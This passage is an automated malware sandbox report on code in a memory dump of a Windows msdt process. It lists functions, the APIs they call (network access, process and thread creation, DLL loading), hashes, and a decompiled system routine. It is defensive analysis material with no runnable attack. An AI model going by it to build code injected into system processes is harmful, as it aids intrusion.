                                                                    control_flow_graph 124 118bf0-118c31 call 119280 127 118c33-118c4d InternetOpenA 124->127 128 118c4e-118c54 124->128
                                                                    APIs
                                                                    • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 00118C47
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InternetOpen
                                                                    • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                    • API String ID: 2038078732-3155091674
                                                                    • Opcode ID: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                                                    • Instruction ID: f6f659a60f76e5ba1ce56cc83fcc9a50b37c0ecdd8ed60ebd71b17e5b2867247
                                                                    • Opcode Fuzzy Hash: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
                                                                    • Instruction Fuzzy Hash: 31F019B2901118AF8B14DFD8DC419EBB7B8FF48310B048589FE1897201D634AE50CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 001172F0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 172 1172f0-117332 call 11a010 175 117338-117388 call 11a0e0 call 109b30 call 113e40 172->175 176 11740c-117412 172->176 183 117390-1173a1 Sleep 175->183 184 1173a3-1173a9 183->184 185 117406-11740a 183->185 186 1173d3-1173f4 call 117120 184->186 187 1173ab-1173cc call 116f20 184->187 185->176 185->183 191 1173f9-1173fc 186->191 190 1173d1 187->190 190->191 191->185
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 00117398
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: net.dll$wininet.dll
                                                                    • API String ID: 3472027048-1269752229
                                                                    • Opcode ID: 426973fb1a57eff7d1f100196f40cf351785a3edbd583783db48d78446031429
                                                                    • Instruction ID: 635c89e80c7d054bf3c942a7e793a302209231faaafdbd2ce7cf4178693c3e1d
                                                                    • Opcode Fuzzy Hash: 426973fb1a57eff7d1f100196f40cf351785a3edbd583783db48d78446031429
                                                                    • Instruction Fuzzy Hash: C73192B6505704ABC719DF64C8A1FABB7B8FF48700F00812DFA599B281D770A545CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 001188E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 195 1188e0-118911 call 1191d0 RtlFreeHeap
                                                                    APIs
                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00103B93), ref: 0011890D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeHeap
                                                                    • String ID: .z`
                                                                    • API String ID: 3298025750-1441809116
                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                    • Instruction ID: 73a30a8809dd1a837a6ac51e7746bf35cfde81260f5982168a2763a0c7debcac
                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                    • Instruction Fuzzy Hash: A1E01AB12002086BD718EF59CC49EA777ACAF88750F014554BD1857241C630E910CAB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00107280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001072DA
                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001072FB
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
                                                                    • Instruction ID: 0276eda4b3c44618e622affe0f53b29f2248bd2527b14e93836c84edb86d37eb
                                                                    • Opcode Fuzzy Hash: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
                                                                    • Instruction Fuzzy Hash: F401A731A8122877E725A6949C03FFE776C5F10B51F154124FF04BA1C2E7D4790546F6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00109B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 408 109b30-109b59 call 11af60 411 109b5b-109b5e 408->411 412 109b5f-109b6d call 11b380 408->412 415 109b7d-109b8e call 119710 412->415 416 109b6f-109b7a call 11b600 412->416 421 109b90-109ba4 LdrLoadDll 415->421 422 109ba7-109baa 415->422 416->415 421->422
                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00109BA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                    • Instruction ID: 01a0a57286943466101e5d540b2b0a09b8d18c059394c915e2ce17bb7cb7f682
                                                                    • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                    • Instruction Fuzzy Hash: 26011EB5E0020DABDB14DAA4EC82FDDB778AF54308F0041A5E91897282F771EB54CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00118950, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 423 118950-1189a8 call 1191d0 CreateProcessInternalW
                                                                    APIs
                                                                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001189A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInternalProcess
                                                                    • String ID:
                                                                    • API String ID: 2186235152-0
                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction ID: c3651b590ff502ae7fbdc45e4c92d6896489fadc82eb3583f881e59c8b36aadc
                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                    • Instruction Fuzzy Hash: FD01AFB2210108BBCB58DF89DC84EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00117420, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 426 117420-117448 call 113e40 429 117467-11746c 426->429 430 11744a-117466 call 11d5a2 CreateThread 426->430
                                                                    APIs
                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0010CCE0,?,?), ref: 0011745C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: c715afaf5ee72f4797a90bb05736108bd71666473cbd07088045a551ffb1ab32
                                                                    • Instruction ID: b8d998c5ebf287e4316f4f9896886c301891d21761bc46b1188e99af2af8d52d
                                                                    • Opcode Fuzzy Hash: c715afaf5ee72f4797a90bb05736108bd71666473cbd07088045a551ffb1ab32
                                                                    • Instruction Fuzzy Hash: 7BE06D333813143AE2206599AC03FE7B69C8B95B60F140036FA0DEA2C1D695F84142A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00117EC0, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlDosPathNameToNtPathName_U.NTDLL(00700069,00000000,00000000,00104965,00000000,00000000,00700069,?,00103B93), ref: 00117EF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Path$NameName_
                                                                    • String ID:
                                                                    • API String ID: 3514427675-0
                                                                    • Opcode ID: 991622dfa8962ad2ab0fbcb377ea20e9540ada2c14e034a2f5a96e5b281a6e83
                                                                    • Instruction ID: 0f986b2952d06a4de8eda4a18d6fc1f4e445ecb7b88edf4938ace8a028962b09
                                                                    • Opcode Fuzzy Hash: 991622dfa8962ad2ab0fbcb377ea20e9540ada2c14e034a2f5a96e5b281a6e83
                                                                    • Instruction Fuzzy Hash: 14E0E5B5600208ABCB14DF88CC85EAB7BACAF88660F008458BA1897241C670F9508BE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00118A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0010CFB2,0010CFB2,?,00000000,?,?), ref: 00118A70
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LookupPrivilegeValue
                                                                    • String ID:
                                                                    • API String ID: 3899507212-0
                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction ID: cc71525c529ca7f808d2324b1143c0ee2c3782e03529d244a044d60f3d3e49b2
                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                    • Instruction Fuzzy Hash: 13E01AB12002086BDB14EF49CC85EEB37ADAF88650F018164BE0857241CA30E8508BF5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 001188A0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00113526,?,00113C9F,00113C9F,?,00113526,?,?,?,?,?,00000000,00000000,?), ref: 001188CD
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                    • Instruction ID: 5a46b1bc054fa5039d4748d8ced6e9ca92772e768a96e31cbccd175efaa56e68
                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                    • Instruction Fuzzy Hash: F0E012B1200208ABDB18EF99CC45EAB77ACAF88660F118558BE185B242C630F910CAB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0010D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,00107C83,?), ref: 0010D44B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, Offset: 00100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_100000_msdt.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                    • Instruction ID: bbcfd65a8949d0636528ab6acbdf1449afa78fcecca56a9314a4b796ed3d7ea2
                                                                    • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                    • Instruction Fuzzy Hash: 66D0A7717503043BE610FAE49C03F6672CC5B54B00F494074F948D73C3DE64F5004161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 025B8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E025B8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E025B8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0259E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E025B718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E025B8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E025B718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E025B8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E025B8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E025B8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E025B718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02592340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E025AE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0259E2A8(_t322,  &_v68, _v16);
								if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E025AE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0259E2A8(_t322,  &_v68, _t236);
								if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E025B718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02592340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E025AE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0259E2A8(_v12,  &_v68, _v16);
							if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E025AE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0259E2A8(_t322,  &_v68, _t269);
							if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E025B718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0259E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02592340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E025AE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0259E2A8(_v12,  &_v68, _v16);
						if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E025AE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0259E2A8(_t322,  &_v68, _t296);
						if(E025B5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0259E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                    0x025b8788
                                                                    0x025b8788
                                                                    0x025b8791
                                                                    0x025b8794
                                                                    0x025b8798
                                                                    0x025b879b
                                                                    0x025b879e
                                                                    0x025b87a1
                                                                    0x025b87a4
                                                                    0x025b87a7
                                                                    0x025b87aa
                                                                    0x025b87af
                                                                    0x02601ad3
                                                                    0x025b8b0a
                                                                    0x025b8b0d
                                                                    0x025b8b13
                                                                    0x025b8b19
                                                                    0x025b8b1f
                                                                    0x025b8b25
                                                                    0x025b8b2b
                                                                    0x025b8b31
                                                                    0x025b8b37
                                                                    0x025b8b3d
                                                                    0x025b8b46
                                                                    0x025b8b46
                                                                    0x025b87c6
                                                                    0x025b87d0
                                                                    0x02601ae0
                                                                    0x02601ae6
                                                                    0x02601af8
                                                                    0x02601af8
                                                                    0x02601afd
                                                                    0x02601afe
                                                                    0x02601b01
                                                                    0x02601b06
                                                                    0x02601b06
                                                                    0x025b87d6
                                                                    0x025b87f2
                                                                    0x025b87f7
                                                                    0x025b8807
                                                                    0x025b880a
                                                                    0x025b880f
                                                                    0x025b8810
                                                                    0x025b8813
                                                                    0x025b8818
                                                                    0x025b8818
                                                                    0x025b882c
                                                                    0x025b8831
                                                                    0x025b8838
                                                                    0x025b8908
                                                                    0x025b8920
                                                                    0x025b89f0
                                                                    0x025b8a08
                                                                    0x025b8af6
                                                                    0x025b8af6
                                                                    0x025b8af8
                                                                    0x025b8afb
                                                                    0x02601beb
                                                                    0x02601beb
                                                                    0x025b8b04
                                                                    0x02601bf8
                                                                    0x02601c0e
                                                                    0x02601c13
                                                                    0x02601c16
                                                                    0x02601c16
                                                                    0x02601bf8
                                                                    0x00000000
                                                                    0x025b8b04
                                                                    0x025b8a0e
                                                                    0x025b8a11
                                                                    0x025b8a14
                                                                    0x025b8a15
                                                                    0x025b8a18
                                                                    0x025b8a22
                                                                    0x025b8b59
                                                                    0x025b8a28
                                                                    0x025b8a3c
                                                                    0x025b8a3c
                                                                    0x025b8a42
                                                                    0x02601bb0
                                                                    0x02601b11
                                                                    0x02601b11
                                                                    0x00000000
                                                                    0x025b8a48
                                                                    0x025b8a51
                                                                    0x025b8a5b
                                                                    0x025b8a5e
                                                                    0x025b8a61
                                                                    0x025b8a69
                                                                    0x025b8a69
                                                                    0x025b8a6d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x025b8a74
                                                                    0x025b8a7c
                                                                    0x025b8a7d
                                                                    0x025b8a91
                                                                    0x025b8a93
                                                                    0x025b8a93
                                                                    0x025b8a98
                                                                    0x025b8a9b
                                                                    0x025b8aa1
                                                                    0x025b8aa1
                                                                    0x025b8aa4
                                                                    0x025b8aaa
                                                                    0x025b8ab1
                                                                    0x025b8ac5
                                                                    0x025b8ac7
                                                                    0x025b8ac7
                                                                    0x025b8ac5
                                                                    0x025b8ace
                                                                    0x02601bc9
                                                                    0x02601bce
                                                                    0x02601bd2
                                                                    0x02601bd2
                                                                    0x025b8ad8
                                                                    0x025b8aeb
                                                                    0x025b8aeb
                                                                    0x025b8af0
                                                                    0x025b8af4
                                                                    0x00000000
                                                                    0x025b8af4
                                                                    0x025b8a42
                                                                    0x025b8926
                                                                    0x025b8929
                                                                    0x025b892c
                                                                    0x025b892d
                                                                    0x025b8930
                                                                    0x025b8935
                                                                    0x025b893a
                                                                    0x025b8b51
                                                                    0x025b8940
                                                                    0x025b8954
                                                                    0x025b8954
                                                                    0x025b895a
                                                                    0x02601b63
                                                                    0x00000000
                                                                    0x025b8960
                                                                    0x025b8969
                                                                    0x025b8973
                                                                    0x025b8976
                                                                    0x025b8979
                                                                    0x025b897e
                                                                    0x025b8981
                                                                    0x025b8981
                                                                    0x025b8986
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02601b6e
                                                                    0x02601b74
                                                                    0x02601b7b
                                                                    0x02601b8f
                                                                    0x02601b91
                                                                    0x02601b91
                                                                    0x02601b99
                                                                    0x02601b9c
                                                                    0x02601ba2
                                                                    0x02601ba2
                                                                    0x025b898c
                                                                    0x025b8992
                                                                    0x025b8999
                                                                    0x025b89ad
                                                                    0x02601ba8
                                                                    0x02601ba8
                                                                    0x025b89ad
                                                                    0x025b89b6
                                                                    0x025b89c8
                                                                    0x025b89cd
                                                                    0x025b89d0
                                                                    0x025b89d0
                                                                    0x025b89d6
                                                                    0x025b89e8
                                                                    0x025b89e8
                                                                    0x025b89ed
                                                                    0x00000000
                                                                    0x025b89ed
                                                                    0x025b895a
                                                                    0x025b883e
                                                                    0x025b8841
                                                                    0x025b8844
                                                                    0x025b8845
                                                                    0x025b8848
                                                                    0x025b884d
                                                                    0x025b8852
                                                                    0x025b8b49
                                                                    0x025b8858
                                                                    0x025b886c
                                                                    0x025b886c
                                                                    0x025b8872
                                                                    0x02601b0e
                                                                    0x00000000
                                                                    0x025b8878
                                                                    0x025b8881
                                                                    0x025b888b
                                                                    0x025b888e
                                                                    0x025b8891
                                                                    0x025b8896
                                                                    0x025b8899
                                                                    0x025b8899
                                                                    0x025b889e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02601b21
                                                                    0x02601b27
                                                                    0x02601b2e
                                                                    0x02601b42
                                                                    0x02601b44
                                                                    0x02601b44
                                                                    0x02601b4c
                                                                    0x02601b4f
                                                                    0x02601b55
                                                                    0x02601b55
                                                                    0x025b88a4
                                                                    0x025b88aa
                                                                    0x025b88b1
                                                                    0x025b88c5
                                                                    0x02601b5b
                                                                    0x02601b5b
                                                                    0x025b88c5
                                                                    0x025b88ce
                                                                    0x025b88e0
                                                                    0x025b88e5
                                                                    0x025b88e8
                                                                    0x025b88e8
                                                                    0x025b88ee
                                                                    0x025b8900
                                                                    0x025b8900
                                                                    0x025b8905
                                                                    0x00000000
                                                                    0x025b8905

                                                                    APIs
                                                                    Strings
                                                                    • Kernel-MUI-Language-Allowed, xrefs: 025B8827
                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 025B8914
                                                                    • Kernel-MUI-Number-Allowed, xrefs: 025B87E6
                                                                    • Kernel-MUI-Language-SKU, xrefs: 025B89FC
                                                                    • WindowsExcludedProcs, xrefs: 025B87C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.667923039.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                                                    • Associated: 00000004.00000002.667912949.0000000002570000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668013063.0000000002660000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668021055.0000000002670000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668029220.0000000002674000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668038516.0000000002677000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668048960.0000000002680000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000004.00000002.668100366.00000000026E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2570000_msdt.jbxd
                                                                    Similarity
                                                                    • API ID: _wcspbrk
